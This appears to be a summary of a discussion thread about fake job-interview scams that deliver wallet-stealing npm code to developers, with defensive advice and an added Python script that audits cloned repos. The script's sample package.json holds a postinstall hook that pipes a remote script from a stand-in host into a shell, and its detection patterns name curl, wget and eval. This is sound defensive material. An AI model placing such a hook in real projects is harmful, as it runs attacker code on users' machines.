I almost got hacked by a 'job interview'
Attack pattern: fake job interviews delivering malware
- Many commenters report nearly identical scams: unsolicited “interviews” (especially for blockchain/web3 roles), followed by a request to clone a private repo (often Bitbucket/Gitea/GitLab) and run npm/Node code that turns out to be a backdoor or wallet stealer.
- Some link these campaigns to known North Korean groups; others had code later analyzed and traced to DPRK infrastructure.
- The original story’s target company and “Chief Blockchain Officer” may be real, impersonated, or completely fabricated; attempts to contact them went unanswered and some LinkedIn profiles were later removed.
Developer supply-chain risk and untrusted code
- The incident is used as a cautionary example of how normalized it is for developers to git clone/npm install unknown code (including interview tasks, npm deps, GitHub snippets), making this vector “perfect for developers.”
- Several note that auditing large dependency trees is effectively impossible; risk must be managed (minimal deps, careful vetting, version locking), not eliminated.
- Others argue the only robust stance is to assume any dependency or build tool may be compromised and design for isolation and least authority.
Sandboxing, tooling, and practical defenses
- Strong support for always running untrusted code in isolated environments: VMs (KVM, Proxmox, Qubes, EC2), devcontainers, or dedicated machines.
- Debate over Docker: convenient and helpful but “not a sandbox” in the strong sense; some recommend incus, gVisor, or full VMs instead.
- Outbound firewalls like Little Snitch/OpenSnitch, Malwarebytes WFC, and tools like LavaMoat, kipuka, sandbox-venv/sandbox-run are recommended to constrain network and runtime privileges.
- Several advocate separate user accounts or devices for sensitive tasks (banking, wallets).
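A check the supply-chain and sandboxing bullets above point toward, as an added example that is not from the thread or the original post: a small Python audit of a cloned “interview task” repo that flags npm lifecycle hooks (which run during `npm install` before anyone reads the code), risky commands inside them, dependencies pulled from outside the registry, and a redirected `.npmrc` registry. The sample package.json and the heuristic patterns are constructed for this example.

```python
import json
import re
from pathlib import Path

# npm lifecycle hooks that run automatically during `npm install` / `npm ci`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Heuristic patterns (constructed for this example) for risky hook commands.
SUSPICIOUS_PATTERNS = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b|https?://", re.I),
    "dynamic_exec": re.compile(r"\beval\(|new Function\(|child_process", re.I),
    "encoded_payload": re.compile(r"base64|\\x[0-9a-f]{2}", re.I),
}
# Dependency specs that bypass the registry: git/URL/github shorthand/local path.
NON_REGISTRY_SPEC = re.compile(r"^(git\+|git://|https?://|github:|file:|[\w.-]+/[\w.-]+(#.*)?$)")


def audit_package_json(text):
    """Return (kind, where, detail) findings for one package.json body."""
    pkg = json.loads(text)
    findings = []
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS:
            continue
        # Any lifecycle hook deserves a look: it executes before you read the code.
        findings.append(("lifecycle_hook", hook, cmd))
        findings += [(kind, hook, cmd) for kind, pat in SUSPICIOUS_PATTERNS.items() if pat.search(cmd)]
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for dep, spec in pkg.get(section, {}).items():
            if NON_REGISTRY_SPEC.match(spec):
                findings.append(("non_registry_dep", f"{section}.{dep}", spec))
    return findings


def audit_repo(root):
    """Audit every package.json in a cloned repo (skipping node_modules) plus .npmrc."""
    root, findings = Path(root), []
    for pj in root.rglob("package.json"):
        if "node_modules" not in pj.parts:
            rel = str(pj.relative_to(root))
            findings += [(k, f"{rel}:{w}", d) for k, w, d in audit_package_json(pj.read_text())]
    npmrc = root / ".npmrc"  # a redirected registry silently swaps every dependency
    if npmrc.is_file() and re.search(r"^\s*registry\s*=", npmrc.read_text(), re.M):
        findings.append(("custom_registry", ".npmrc", npmrc.read_text().strip()))
    return findings


# Constructed sample resembling the "interview task" repos described in the thread.
SAMPLE_PACKAGE_JSON = """{
  "name": "interview-task",
  "scripts": {"postinstall": "curl -s https://example.invalid/setup.sh | sh", "test": "jest"},
  "dependencies": {"express": "^4.18.2", "wallet-helper": "git+https://example.invalid/wallet-helper.git"}
}"""
```

Run it on the clone before any install, and do the install itself with `npm ci --ignore-scripts` inside a throwaway VM rather than on a machine that holds wallets or credentials.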
LinkedIn and identity verification concerns
- LinkedIn is seen as a prime phishing/spear‑phishing channel with many fake or freshly created profiles, sometimes even “verified” via third-party services.
- Heuristics suggested: account age, job-verification badges, and skepticism toward vague “opportunities” and opaque roles.
- Some users report scam approaches tied to HN “Who wants to be hired” and Upwork, often escalating to remote-control or account‑rental requests.
Crypto/blockchain as high‑risk target space
- Many call any “blockchain real estate” or web3 pitch a red flag, arguing the sector is saturated with scams and attracts victims with wallets on dev machines.
- Others note that, despite dubious business value, there are real, well‑funded crypto companies—making this a fertile hunting ground for attackers.
Debate over AI’s role and the AI‑written article
- Commenters disagree on whether AI “saved” the author: some credit human suspicion and luck, with the model acting as a fancy pattern spotter; others see AI-assisted review as genuinely useful.
- Many strongly dislike the blog’s LLM‑generated style, finding it generic, verbose, and trust‑diluting; after the author shared the original draft, multiple readers preferred the unpolished human version.
- Broader worries emerge that widespread AI‑mediated writing erodes individual voice, authenticity, and reader confidence, even when the underlying story is true.